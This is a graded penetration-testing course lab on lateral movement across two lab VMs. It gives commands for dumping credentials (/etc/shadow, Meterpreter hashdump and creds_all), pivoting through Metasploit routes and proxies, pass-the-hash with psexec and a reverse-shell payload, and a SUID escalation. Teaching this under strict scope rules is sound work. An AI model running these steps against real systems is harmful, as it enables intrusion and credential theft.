Classroom Glossary Public page

Lab 10: Lateral Movement and Multi-Host Engagement Transcript

535 words

Week 10 graded lab. Multi-host engagement against the instructor-provided lab range. Kill-chain documentation required.

Learning objectives

  • Use credentials captured on Host A to authenticate to Host B (credential reuse / pass-the-hash)
  • Pivot through a compromised host to reach a second network segment (if the lab includes one)
  • Maintain scope discipline: confirm every new target IP is in the authorized range before connecting
  • Produce a multi-host engagement transcript suitable for use in the capstone report format

Authorization

Authorized range: The instructor-assigned lab network. Both Host A (Metasploitable 2) and Host B (second lab VM) are in this range. The exact IPs are provided at lab start.

Before you begin: Write the authorized range in your session log. Before each new connection attempt, note the target IP and confirm it is in the range.

Scope discipline is graded. If you encounter an IP outside the stated range during this lab (from pivoting or credential spray results), stop, document the excursion with a timestamp, and notify the instructor before continuing.

Setup

# Start session logging:
mkdir -p ~/pen101-workspace/lab-10
script -a ~/pen101-workspace/lab-10/session.log

# Record the authorized range:
echo "Authorized range: <instructor-assigned-range>" >> session-header.txt
echo "Host A IP: <metasploitable2-ip>" >> session-header.txt
echo "Host B IP: <second-host-ip>" >> session-header.txt

Phase 1: Establish foothold on Host A

Use any technique from Labs 7-9. The goal is a Meterpreter session (or equivalent) on Host A.

Required post-exploitation actions before proceeding:

# In your shell or Meterpreter session:
id  # or getuid in Meterpreter
hostname
ifconfig  # or ipconfig on Windows; ip addr on Linux
# IMPORTANT: note ALL network interfaces, not just the primary one

Credential extraction from Host A:

Linux (Metasploitable 2):

# From root shell:
cat /etc/shadow            # password hashes for all local users
cat /home/*/.bash_history  # credentials in command history
find /home /root -name "*.conf" -o -name "*.cfg" -o -name ".env" 2>/dev/null | xargs grep -l "password\|pass\|secret" 2>/dev/null

Windows (from Meterpreter SYSTEM session):

meterpreter > load kiwi
meterpreter > creds_all   # dump NTLM hashes + plaintext if WDigest
meterpreter > hashdump    # SAM database NTLM hashes

Document: What credential material did you extract? Specifically: list usernames + hash type (NT hash, password hash format) + any plaintext credentials found in config files.

Phase 2: Enumerate Host B from Host A

Before moving laterally, enumerate Host B to understand the attack surface.

Option A: Pivot via Metasploit route:

# In Metasploit, with a Meterpreter session on Host A open:
meterpreter > background
msf6 > route add <second-network-range>/<prefix> <session-id>
# or:
msf6 > use post/multi/manage/autoroute
msf6 > set SESSION <session-id>
msf6 > run

# Now scan Host B through the route:
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS <host-b-ip>
msf6 > set PORTS 21,22,80,135,139,443,445,3306,3389,5985
msf6 > run

Option B: Pivot via SSH local forward (if Host A has SSH):

ssh -L 4455:<host-b-ip>:445 msfadmin@<host-a-ip>
# Now: crackmapexec smb 127.0.0.1:4455 <credentials>

Option C: Proxychains + Socks proxy:

# In Metasploit:
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 4a
msf6 > run -j

# Edit /etc/proxychains4.conf:
# socks4  127.0.0.1 1080

# Route tools through the proxy:
proxychains nmap -sT -p 22,80,445,3389 <host-b-ip>

Document: What services are open on Host B? Does the tech stack suggest the same OS as Host A?

Phase 3: Lateral movement to Host B

Use the credentials extracted from Host A to authenticate to Host B.

Credential reuse (same password)

If Host A had plaintext credentials in config files or history:

# SSH reuse:
ssh <username>@<host-b-ip>  # try the same password

# SMB reuse:
crackmapexec smb <host-b-ip> -u <username> -p <password>

Pass-the-hash (NTLM hash, Windows targets)

# psexec via Impacket (from Kali if route is set):
proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py \
    -hashes :<NTLM-hash> Administrator@<host-b-ip>

# Or via Metasploit:
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS <host-b-ip>
msf6 > set SMBUser Administrator
msf6 > set SMBPass <NTLM-hash>
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > run

SSH key reuse

If Host A contained a private key in ~/.ssh/:

# From Kali (after downloading the key from Host A):
ssh -i id_rsa <username>@<host-b-ip>

Proof screenshot: Shell prompt on Host B showing id or whoami and hostname. This confirms you have authenticated to a second host using credentials from the first.

Phase 4: Post-exploitation on Host B

With a shell on Host B:

# Confirm privilege level:
id && hostname && uname -a  # Linux
# or:
whoami && hostname           # Windows

Transfer and run LinPEAS or WinPEAS on Host B. Save the output.

Identify at least one escalation path in the tool output. Document it in the technique-family table format from Lab 9. You do not need to execute the escalation -- documenting the path is sufficient for this lab.

Phase 5: Kill-chain documentation

Produce the engagement kill-chain as a structured text diagram:

## Engagement Kill Chain

Attacker: Kali Linux, 192.168.x.5 (authorized)
Target: Authorized lab range 192.168.x.0/24

Step 1: Initial access
  Method: vsftpd 2.3.4 backdoor (CVE-2011-2523)
  Target: Host A (192.168.x.20, Metasploitable 2)
  Result: Root shell (uid=0)
  Credential captured: /etc/shadow hash for user msfadmin (MD5-crypt)
                       Config file: /var/www/html/.htpasswd plaintext: admin:password1

Step 2: Lateral movement
  Method: SSH credential reuse (password1 from config file)
  Credential used: msfadmin:password1
  Target: Host B (192.168.x.30)
  Result: Low-privilege shell (uid=1001, msfadmin)

Step 3: Privilege escalation path identified (not executed)
  Host B technique: SUID find binary
  Path: find / -name x -exec /bin/sh \;
  Estimated result: root shell

## Scope compliance note

All connections were within the authorized range 192.168.x.0/24.
No connections were made to addresses outside this range.
No persistence mechanisms were installed.

Deliverable

A Markdown document containing:

  1. Engagement kill-chain diagram (Phase 5 format above)
  2. Per-host notes:
    • Host A: initial foothold method, post-exploitation actions, credentials captured
    • Host B: lateral movement method, credential type used, privilege level achieved, escalation paths identified
  3. Scope compliance statement (written by you; affirms the authorized range was respected)
  4. One-page analysis: what credential reuse paths were found? What is the business impact of an attacker being able to move from Host A to Host B using captured credentials?

Appendix: session.log raw terminal transcript.